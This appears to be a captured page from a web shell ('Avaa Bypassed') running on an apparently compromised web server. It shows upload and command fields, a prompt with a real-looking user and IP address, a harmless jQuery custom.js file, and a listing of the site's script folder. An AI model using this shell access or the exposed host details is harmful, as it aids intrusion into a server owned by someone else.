[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.227.46.202: ~ $
// Hover move listing
$(document).ready(function () {
    //superfish
    $("ul.sf-menu").superfish({
        autoArrows: false, // disable generation of arrow mark-up
        animation: {
            height: 'show'
        }
    });
    // rollovers
    $(".side-block a").hover(function () {
        // on rollover	
        $(this).stop().animate({
            marginLeft: "10"
        }, "fast");
    }, function () {
        // on out
        $(this).stop().animate({
            marginLeft: "0"
        }, "fast");
    });
    // slideshow
    $('#slides')
        .before('<div id="slideshow-nav">')
        .cycle({
        fx: 'scrollHorz',
        speed: 500,
        timeout: 6000,
        pause: 1,
        pager: '#slideshow-nav',
        next: 'img#next',
        prev: 'img#prev'
    });
    // fade slide
    $('.fade-slide').cycle({
        fx: 'fade',
        speed: 500,
        timeout: 3000,
        pause: 1
    });
    // toggle
    $(".toggle-container").hide();
    $(".toggle-trigger").click(function () {
        $(this).toggleClass("active").next().slideToggle("slow");
        return false;
    });
    // accordion
    $('.accordion-container').hide();
    $('.accordion-trigger:first').addClass('active').next().show();
    $('.accordion-trigger').click(function () {
        if ($(this).next().is(':hidden')) {
            $('.accordion-trigger').removeClass('active').next().slideUp();
            $(this).toggleClass('active').next().slideDown();
        }
        return false;
    });
    //close			
});
// search clearance	
function defaultInput(target) {
    if ((target).value == 'Search...') {
        (target).value = ''
    }
}

function clearInput(target) {
    if ((target).value == '') {
        (target).value = 'Search...'
    }
}

Filemanager

Name Type Size Permission Actions
superfish-1.4.8 Folder 0755
bebas_400.font.js File 32.04 KB 0644
cufon-yui.js File 17.83 KB 0644
custom.js File 1.73 KB 0644
easing.js File 7.91 KB 0644
jquery.cycle.all.js File 44.98 KB 0644
jquery_1.3.2.js File 55.91 KB 0644
jqueryui.js File 10.51 KB 0644